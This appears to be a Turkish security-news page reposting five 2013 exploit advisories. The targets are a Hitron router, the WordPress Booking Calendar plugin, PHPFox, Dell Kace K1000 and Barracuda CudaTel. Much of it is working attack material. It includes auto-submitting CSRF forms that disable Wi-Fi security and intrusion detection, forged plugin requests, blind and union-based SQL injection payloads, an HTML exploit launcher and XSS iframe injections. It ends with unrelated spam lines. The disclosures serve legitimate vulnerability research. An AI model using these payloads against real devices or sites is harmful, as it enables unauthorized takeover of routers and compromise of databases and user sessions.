Router ONO Hitron CDE-30364 – CSRF Vulnerability

Router ONO Hitron CDE-30364 – CSRF Vulnerability açığı bulunmuş olup açığın oluşum yeri ve açıklamalar aşağıdaki gibidir.

# Exploit Title: Router ONO Hitron CDE-30364 - CSRF Vulnerability
# Date: 14-9-2013
# Exploit Author: Matias Mingorance Svensson - matias.ms[at]owasp.org
# Vendor Homepage:
http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/
# Tested on: Hitron Technologies CDE-30364
# Version HW: 1A
# Version SW: 3.1.0.8-ONO
  
-----------------------------------------------------------------------------------------
Introduction:
-----------------------------------------------------------------------------------------
Hitron Technologies CDE-30364 is a famous ONO Router using, also, a web
management interface in order to set and change device parameters.
  
The Hitron Technologies CDE-30364's web interface (listening on tcp/ip port
80) is prone to CSRF vulnerabilities which allows to change router
parameters and to perform many modifications to the router's parameters.
The default ip adress of this adsl router, used for management purpose, is
192.168.1.1.
  
-----------------------------------------------------------------------------------------
Exploit-1: Enable/Disable Web Site Blocking and add new Key Word/URL
blocking(google in this case)
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Keyword?file=parent-website&dir=admin
%2F&checkboxName=on&blockingFlag=1&blockingAlertFlag=&cfKeyWord_Domain=&cfTrusted_MACAddress=&cfTrusted_MACAddress0=
0&cfTrusted_MACAddress1=0&cfTrusted_MACAddress2=0&cfTrusted_MACAddress3=0&cfTrusted_MACAddress4=0&cfTrusted_MACAddre
ss5=0&trustedMAC=&keyword0=google">
</body>
</html>
  
-----------------------------------------------------------------------------------------
Exploit-2: Enable/Disable Intrusion Detection System
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Firewall?dir=admin%2F&file=feat-
firewall&ids_mode=0&IntrusionDMode=on&rspToPing=1">
</body>
</html>
  
-----------------------------------------------------------------------------------------
Exploit-3: Disable(None) Wireless Security Mode
-----------------------------------------------------------------------------------------
<html>
<body onload="javascript:document.forms[0].submit()">
<H2></H2>
<form method="POST" name="form0" action="
http://192.168.1.1/goform/Wls?dir=admin
%2F&file=wireless_e&key1=0000000000&key2=0000000000&key3=0000000000&key4=0000000000&k128_1=0000000000000000000000000
0&k128_2=00000000000000000000000000&k128_3=00000000000000000000000000&k128_4=00000000000000000000000000&ssid_list=0&
Encrypt_type=0">
</body>
</html>
  
-----------------------------------------------------------------------------------------
Many other changes can be performed.

WordPress Booking Calendar 4.1.4 – CSRF Vulnerability

WordPress Booking Calendar 4.1.4 – versiyonunsa CSRF Açığı bulunmuş olup, Açığın oluşumu ve açık hakkındaki açıklamalar aşağıdaki gibidir.

###########################################################################################
# Exploit Title: CSRF Plugin Booking Calendar 4.1.4 � WordPress
# Date: 04 de Agosto del 2013
# Exploit Author: Dylan Irzi
# Vendor Homepage: http://wpbookingcalendar.com/
# Tested on: Win8 & Linux Mint
# Affected Version : 4.1.4
#
# Greetz: all team WebSecuritydev.
###########################################################################################
CSRF VIA POST.

A�adir nuevo.
http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php

POST:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101
Firefox/22.0 AlexaToolbar/alxf-2.18
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer:
http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking-reservation
Content-Length: 311
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

-----------------------------------------------------------
ajax_action=INSERT_INTO_TABLE&bktype=1&dates=19.07.2013&form=text%5Ename1%5Etest~text%5Esecondname1%5Etest~email%5Eemail1%5Edylan.irzi%
40gmail.com
~text%5Ephone1%5Etest~textarea%5Edetails1%5Etest&captcha_chalange=&captcha_user_input=&is_send_emeils=1&my_booking_hash=&booking_form_type=&wpdev_active_locale=es_ES

---------------------------------------------------------
---------------------------------------------------------

Delete:
Url: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php

Post:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101
Firefox/22.0 AlexaToolbar/alxf-2.18
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer:
http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=4&view_mode=vm_listing&tab=actions
Content-Length: 104
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache


---------------------------

ajax_action=DELETE_APPROVE&booking_id=4&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES

---------------------------------------------------------
---------------------------------------------------------
<< Aprobar Evento >>
URL: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php

POST:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101
Firefox/22.0 AlexaToolbar/alxf-2.18
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer:
http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=6&view_mode=vm_listing&tab=actions
Content-Length: 128
Cookie:
wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7C9f7f8aa8b2ea97a3464e6053c3c9f271;
wp-settings-time-1=1373853874; wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7Cdd2c6fcb13e1f80327b123e484bd677b;
PHPSESSID=ica6bf0tjnajr0r2rcc1se1fl0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

---------------------------------------------------------
ajax_action=UPDATE_APPROVE&booking_id=6&is_approve_or_pending=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES

---------------------------------------------------------
---------------------------------------------------------

-- 
*By Dylan Irzi
@Dylan_Irzi11
Pentest de Seguridad.
WhiteHat.
*

PHPFox 3.6.0 (build3) Multiple SQL Injection Vulnerabilities

PHPFox 3.6.0 (build3) Multiple SQL Injection Açığı bulunmuş olup, Açık bulucunun açığın oluşum yerleri ve açık hakındaki açıklamaları aşağıdaki şekildedir.

------------------------------------------------------------
PHPFox v3.6.0 (build3) Multiple SQL Injection vulnerabilities
------------------------------------------------------------

== Description ==
- Software link: http://www.phpfox.com
- Affected versions: version 3.6.0 (build3) is vulnerable. Other
versions might be affected as well.
- Vulnerability discovered by: Matias Fontanini

== Vulnerabilities ==
When performing POST requests to /user/browse/view_/, the
"search[gender]" and "search[sort_by]" parameters are not correctly
sanitized before being used to construct SQL queries, making them
vulnerable to Blind SQL Injection attacks.

== Proof of concept ==

- For the "search[gender]" parameter, using the condition "1=0" so
that no results are returned:

POST /user/browse/view_/
core[security_token]=0db230b2a8b6755b8cfe60d97fb1a613&search[gender]=2
and 1=0search[from]=&search[to]=&search[country]=&null=1&search[city]=&search[zip]=&search[keyword]=&search[type]=0&search[submit]=Submit&custom[1]=&custom[2]=&custom[3]=&custom[4]=&custom[5]=&custom[6]=&custom[7]=&search[sort]=u.last_login&search[sort_by]=DESC

- The "search[sort_by]" parameter is inserted in a "order by" clause.
Therefore, an attacker could exploit it by making the application sort
the results based on a different criteria, depending on whether the
query was successful:

POST /user/browse/view_/
core[security_token]=0db230b2a8b6755b8cfe60d97fb1a613&search[gender]=2&search[from]=&search[to]=&search[country]=&null=1&search[city]=&search[zip]=&search[keyword]=&search[type]=0&search[submit]=Submit&custom[1]=&custom[2]=&custom[3]=&custom[4]=&custom[5]=&custom[6]=&custom[7]=&search[sort]=u.last_login&search[sort_by]=ASC,(case
when (select 1 from dual) then birthday_search else password end)

== Solution ==
Upgrade the product to the 3.6.0 (build6) version. Note that builds 4
and 5 also contain the vulnerability present in the "search[sort_by]"
parameter, but not the other one.

== Report timeline ==
[2013-07-30] Vulnerability reported to vendor.
[2013-07-30] Developers answered back indicating that an update would
be released soon.
[2013-08-07] PHPFox 3.6.0 (build6) was released, which fixed all of
the issues reported.
[2013-08-07] Public disclosure.

Dell Kace 1000 SMA 5.4.742 – SQL Injection Vulnerabilities

Dell Kace 1000 SMA 5.4.742 – SQL Injection Vulnerabilities

Title:
======
Dell Kace 1000 SMA 5.4.742 - SQL Injection Vulnerabilities


Date:
=====
2013-07-22


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=832


VL-ID:
=====
832


Common Vulnerability Scoring System:
====================================
7.5


Introduction:
=============
Dell KACE is to provide an appliance-based approach to systems management, to create time for systems administration professionals, 
while saving money for their companies. Dell KACE Systems Management Appliances are available as both physical and virtual appliances. 

The KACE Management Appliance delivers a fully integrated systems management solution, unlike traditional software approaches that 
can require complex and time-consuming deployment and maintenance. KACE accomplishes this via an extremely flexible, intelligent 
appliance-based architecture that typically deploys in days and is self maintaining. The KACE Management Appliance also provides 
direct access to time-saving ITNinja systems management community information using AppDeploy Live, the leading destination for end 
point administrators. The result: Comprehensive systems management that is easy-to-use and that can be more economical than software 
only alternatives. Read more in the white paper KACE K1000 Management Appliance Architecture: Harnessing the Power of an 
Appliance-based Architecture. The KACE Management Appliance is designed for enterprises and business units with up to 20,000 nodes. 

(Copy of the Vendor Homepage:  http://www.kace.com/products/systems-management-appliance )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered a SQL Injection web vulnerabilities in Dell Kace K1000, Systems Management Appliance.


Report-Timeline:
================
2013-01-24:     Researcher Notification & Coordination (Ibrahim Mosaad El-Sayed)
2013-02-06:     Vendor Notification (Dell Security Team)
2013-02-08:     Vendor Response/Feedback  (Dell Security Team)
2013-**-**:     Vendor Fix/Patch (Dell Security Team)
2013-07-22:     Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
DELL
Product: Kace K1000 SMA 5.4.70402


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
Multiple SQL Injection vulnerabilities are detected in the Dell Kace K1000, Systems Management Appliance Application.
A SQL Injection vulnerability allows an attacker (remote) to execute/inject SQL commands in the affected application dbms. 

The sql injection vulnerabilities are located in the history_log.php, service.php, software.php, settings_network_scan.php, 
asset.php, asset_type.php, metering.php and mi.php files. All files are located in the adminui. A remote attacker is able 
to inject own sql commands when processing to request the vulnerable TYPE_ID and ID parameters.

Exploitation of the sql injection vulnerabilities requires no or a low privilege application user account and no user interaction. 
Successful exploitation of the vulnerability results in database management system & application compromise via remote sql injection attack. 


Vulnerable Module(s):
					[+] adminui

Vulnerable File(s):
					[+] history_log.php
					[+] service.php
					[+] software.php
					[+] settings_network_scan.php
					[+] asset.php
					[+] asset_type.php
					[+] metering.php
					[+] mi.php
					[+] replshare.php
					[+] kbot.php

Vulnerable Parameter(s):
					[+] TYPE_ID
					[+] ID


Proof of Concept:
=================
The SQL injection vulnerabilities can be exploited by remote attackers without privileged application user account and without required user interaction. 
For demonstration or reproduce ...

1.1
PoC:
https://pub37.137.0.0.1:8080/adminui/history_log.php?HISTORY_TYPE=ASSET&TYPE_NAME=Computer&TYPE_ID=7+union+Select+1,2,3,4,5,6,version%28%29,8,9,10,11,12--%20-

1.2
PoC:
https://pub37.137.0.0.1:8080/adminui/service.php?ID=-1211+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20-

1.3
 https://pub37.137.0.0.1:8080/adminui/software.php?ID=1291+[SQL-INJECTION!]--

Exploit:

<html>
<head><body><title>Download</title>
<iframe src=https://pub37.137.0.0.1:8080/adminui/history_log.php?HISTORY_TYPE=ASSET&TYPE_NAME=Computer&TYPE_ID=7+union+Select+1,2,3,4,5,
6,version%28%29,8,9,10,11,12--%20- width="600" height"600"><br><iframe src=https://pub37.137.0.0.1:8080/adminui/service.php?ID=-1211+
union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20- width="600" height"600"><br><iframe src=
https://pub37.137.0.0.1:8080/adminui/software.php?ID=1291+[SQL-INJECTION!]-- width="600" height"600"><br>
</body></head>
</html>

 --- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/adminui/software.php on line 95: 
mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server 
version for the right syntax to use near ''1291''' at line 1] in EXECUTE("select OS_ID from SOFTWARE_OS_JT where SOFTWARE_ID = '1291''")
 
1.4
PoC: 
https://pub37.137.0.0.1:8080/adminui/settings_network_scan.php?ID=2+[SQL-INJECTION!]--%20-

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/adminui/settings_network_scan.php on line 54: 
 mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near ''' at line 1] 
 in EXECUTE("select * from SCAN_SETTINGS where ID = 2'")
 
1.5
PoC: 
https://pub37.137.0.0.1:8080/adminui/asset.php?ID=2+[SQL-INJECTION!]--%20-
 
--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/include/Asset.class.php on line 61: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near ''' at line 3] 
in EXECUTE("select *, DATE_FORMAT(CREATED,'%b %d %Y %I:%i:%s %p') as CREATED,
DATE_FORMAT(MODIFIED,'%b %d %Y %I:%i:%s %p') as MODIFIED
from ASSET where ID = 2'")

1.6
PoC:
https://pub37.137.0.0.1:8080/adminui/asset_type.php?ID=5+[SQL-INJECTION!]--%20-

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/include/AssetType.class.php on line 62: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near ''5''' at line 1] 
in EXECUTE("select * from ASSET_TYPE where ID = '5''")

1.7
PoC: 
https://pub37.137.0.0.1:8080/adminui/metering.php?ID=11+[SQL-INJECTION!]--%20-&MONTHS=1

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/adminui/metering.php on line 65: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near ''' at line 2] 
in EXECUTE("select LABEL_ID from FS_LABEL_JT
where FS_ID =11'") 

1.8
PoC: 
https://pub37.137.0.0.1:8080/adminui/mi.php?ID=5

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/adminui/mi.php on line 350: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near 'hidden')))' at line 4] 
in EXECUTE("select ID,NAME from MACHINE
WHERE ID in ( Select MACHINE_ID from MACHINE_LABEL_JT
where LABEL_ID in ( Select LABEL_ID from MI_LABEL_JT
where MI_ID = '5'' and LABEL_ID in
(select ID from LABEL where TYPE='hidden')))")

1.9
PoC: 
https://pub37.137.0.0.1:8080/adminui/replshare.php?ID=1+[SQL-INJECTION!]--%20-

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in /kbox/include/ReplShare.class.php on line 20: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near ''' at line 2] 
in EXECUTE("select * from REPLICATION_SHARE where ID=1'")

1.10
PoC: 
https://pub37.137.0.0.1:8080/adminui/kbot.php?ID=20+[SQL-INJECTION!]--%20-

--- SQL Exception Error Log --- 
Error message: PHP Error: Uncaught ADODB_Exception in /kbox/kboxwww/include/KBot.class.php on line 183: mysql error: 
[1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near ''20''' at line 15] 
in EXECUTE("select k.*, DATE_FORMAT(k.CREATED,'%b %d %Y %I:%i:%s %p'), DATE_FORMAT(k.MODIFIED,'%b %d %Y %I:%i:%s %p'),
unix_timestamp(k.MODIFIED) as MODIFIED_TMSTAMP,
unix_timestamp(k.CREATED) as CREATED_TMSTAMP,
f.ID as FORM_ID, f.FORM_URL, f.FORM_NAME,
s.SCRIPT_TEXT, s.FILE_NAME, s.CHECKSUM, s.TIMEOUT,
s.REMOVE_FILES, s.UPLOAD_FILE, s.UPLOAD_FILE_PATH, s.UPLOAD_FILE_NAME,
k.RUN_AS_USR, k.RUN_AS_PASS_ENC,
k.ALERT_ENABLED, k.ALERT_DIALOG_OPTIONS,
k.ALERT_DIALOG_TIMEOUT, k.ALERT_DIALOG_TIMEOUT_ACTION, k.ALERT_SNOOZE_DURATION, k.ALERT_MESSAGE
from KBOT k
left join KBOT_FORM f
on k.ID = f.KBOT_ID
left join KBOT_SHELL_SCRIPT s
on k.ID = s.KBOT_ID
where k.ID = '20''")


Risk:
=====
The security risk of the remote sql injection web vulnerabilities are estimated as critical.


Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) ibrahim@evolution-sec.com]


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright � 2013 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

Barracuda CudaTel 2.6.02.040 – Remote SQL Injection Vulnerability

Barracuda CudaTel 2.6.02.040 – Remote SQL Injection Vulnerability
açığı ile ilgili olarak açığın oluşum yerleri hakkında açıklamalar şu şekilde;

Title:
======
Barracuda CudaTel 2.6.02.040 - Remote SQL Injection Vulnerability


Date:
=====
2013-07-20


References:
===========
http://vulnerability-lab.com/get_content.php?id=775

BARRACUDA NETWORK SECURITY ID: BNSEC-723


VL-ID:
=====
775


Common Vulnerability Scoring System:
====================================
8.6


Introduction:
=============
Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, 
affordable, next-generation phone system for businesses. CudaTel Communication Server s enterprise-class 
feature set includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, 
and more, controlled by an easy-to-use Web interface. CudaTel Communication Server is compatible with any SIP 
device and provider, and can be pre-configured for use with both analog and digital telephone networks. Powerful, 
Complete Solution With an expansive feature set and and no per user or phone licensing fees, the CudaTel 
Communication Server is equipped and priced for organizations of any size. Native High Definition audio support 
and integrated phone line (TDM) hardware produces an unparalleled audio experience. VOIP encryption protects calls 
from hackers and digital eavesdroppers.

(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )


Abstract:
=========
1.1
The Vulnerability Laboratory Research Team discovered a sql injection vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.

1.2
The Vulnerability Laboratory Research Team discovered a client side vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.


Report-Timeline:
================
2012-11-26:	Researcher Notification & Coordination (Benjamin Kunz Mejri)
2012-11-27:	Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
2012-12-01:	Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program)
2013-03-01:	Vendor Fix/Patch (Barracuda Networks Developer Team) [Manager: Dave Farrow]
2013-07-20:	Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
1.1
A SQL Injection vulnerability is detected in the Barracuda Networks CudaTel v2.6.002.040 appliance web application.
The vulnerability allows remote attackers or local low privilege application user accounts to inject (execute) 
own SQL commands to the affected application dbms. 

The blind sql injection vulnerability is located in the cdr module when processing to request manipulated row & page 
parameters as searchstring. A remote attacker can for example delete the standard value context of the module request 
to inject (execute) own sql commands. 

Eploitation of the vulnerability requires a low privilege web application user account and no user interaction.
Successful exploitation of the vulnerability results in datbase management system and web application compromise.

Vulnerable Section(s)
				[+] search - listing

Vulnerable Module(s)
				[+] cdr - seachstring listing

Vulnerable Parameter(s)
				[+] &row
				[+] &page



1.2
A client side input validation vulnerability is detected in the Barracuda Networks CudaTel v2.6.002.040 appliance web application.
The non-persistent vulnerability allows remote attackers to manipulate client side application requests to browser.

The secound vulnerability (client side) is located in the invalid value exception handling. Remote attackers can provoke the 
exception-handling by including invalid script code inputs to redisplay the malicious context when processing to load the output.
To provoke the exception-handling the remote attacker can use the vulnerable row parameter of the cdr searchstring listing to 
execute own malicious (client-side) script code.

Exploitation of the vulnerability requires a no web application user account but medium or high user interaction.
Successful exploitation of the vulnerability results in client side phishing, client side session hijacking and client side 
external redirects to malware or malicious websites. Exploitation requires medium user interaction.

Vulnerable Section(s):
				[+] search - listing

Vulnerable Module(s):
				[+] cdr - seachstring listing

Vulnerable Parameter(s):
				[+] &row

Affected Module(s):
				[+] Exception-Handling (invalid value)


Proof of Concept:
=================
1.1
The sql injection vulnerability can be exploited by remote attackers with low privilege web application user account and without user interaction.
For demonstration or reproduce ...

Standard Request: Row 100
http://cudatel.127.0.0.1:1336/gui/cdr/cdr?_=1353973149509&since=1+day&search_string=&rows=100&page=1&sortby=end_timestamp&sortorder=desc

Standard Request: Output
--- 1.
{"count":0,"page":"1","cdr":[],"rows":"100"}


Manipulated Request: 
http://cudatel.127.0.0.1:1337/gui/cdr/cdr?
_=1353973149509&since=1+day&search_string=&rows=100&page='1+1%27[SQL-Injection!]%27--&sortby=end_timestamp&sortorder=desc
... or
http://cudatel.127.0.0.1:1337/gui/cdr/cdr?
%20%20_=1353973149509&since=1+day&search_string=&page='1335&page='1336&page='1337&rows='1+1%27[SQL-Injection!]%27--&page=1&sortby=end_timestamp&sortorder=desc


Manipulated Output:
--- 1.

cdr: []

count: 0
page: 1
rows: 1+2


--- 1.
cdr: []

count: 1+2'
page: 
  - '1335
  - '1336
  - '1337
  - '1
rows: -1+1'[SQL-Injection!]'--


Exploit (PoC):

<html><head><body><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9">
<title>Download</title>
<script language="JavaScript">
var path="/gui/cdr/cdr"
var adres="?%20%20_=1353973149509&since=1+day&search_string=&page='1335&page='1336&page='1337&rows="
var domain ="http://cudatel.127.0.0.1:1337"
var sql = "'1+1%27[SQL-Injection!]%27--"  
function command(){
if (document.rfi.target1.value==""){
alert("NOPE!");
return false;
}  
rfi.action= document.rfi.target1.value+path+adres+domain+sql;
rfi.submit();
}
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Barracuda Networks CudaTel [CDR] (ROW&PAGE) - Remote SQL-Injection Exploit
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Vulnerability Research Laboratory (www.vulnerability-lab.com)
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
// Greets: Ibrahim EL-Sayed, Chokri Ben Achour, Mohammed ABKD. & Stealthwalker
//=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
</script></head><body bgcolor="#000000" link="#990000">
<center><p align="center"><b><font face="Verdana" size="2" color="#006633">Barracuda Networks CudaTel [CDR] (ROW&PAGE) 
- Remote SQL-Injection Exploit</font>
</b></p><form method="post" target="getting" name="rfi" onSubmit="command();"><div align="left">
<p><b><font face="Arial" size="2" color="#006633">VICTIM:</font></b>
<input type="text" name="target1" size="53" style="background-color: #006633" onMouseOver="javascript:this.style.background='#808080';" onMouseOut="javascript:this.style.background='#808000';"></p>
<p><b><font face="Arial" size="2" color="#006633">EXAMPLE:</font><font face="Arial" size="2" color="#808080">  
HTTP://VULNERABILITY-LAB.COM/[SCRIPT-PATH]/</font></b></p></div>
<p align="left"><input type="submit" value="Execute INPUT" name="B1">
</p><p align="left"><input type="reset" value="Clear ALL" name="B2"></p></form><p><br>
<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe></p><div align="left">
  <p align="center"><b><font face="Verdana" size="2" color="#008000">VULNERABILITY-LAB <a href="mailto:research@vulnerability-lab.com">
BKM</a></font></b></p></div></center></body></html>


1.2
The client side input validation vulnerability can be exploited by remote attackers without application user account and with medium required user interaction.
For demonstration or reproduce ...

PoC:
http://cudatel.127.0.0.1:1336/gui/cdr/cdr?
_=1353973149509&since=1+day&search_string=&rows=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]&page=1&sortby=end_timestamp&sortorder=desc

http://cudatel.127.0.0.1:1336/gui/cdr/cdr?
_=1353973149509&since=1+day&search_string=&rows=100&page=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]&sortby=end_timestamp&sortorder=desc

Note: We only verified the bug with the same exception in a not parsed parameter but the bug itself is located in all areas of the invalid exception.


Solution:
=========
1.1
To patch the sql injection it is required to parse the row and page parameters in the cdr module.

1.2
To fix the client side xss vulnerability parse by encoding the row parameter and restrict the input.
Encode the affected exception-handling output listing when processing to display invalid input values.

Note: Barracuda Networks provided an update of version 2.6.002.040 to v2.6.003.x to all clients and customers in the bn customer area.


Risk:
=====
1.1
The security risk of the remote sql injection web vulnerability  is estimated critical.

1.2
The security risk of the client side input validation web vulnerability is estimated as medium(-).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright � 2013 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


2.el eşya
escort bayan escort bayan escort bayan fantazi iç giyim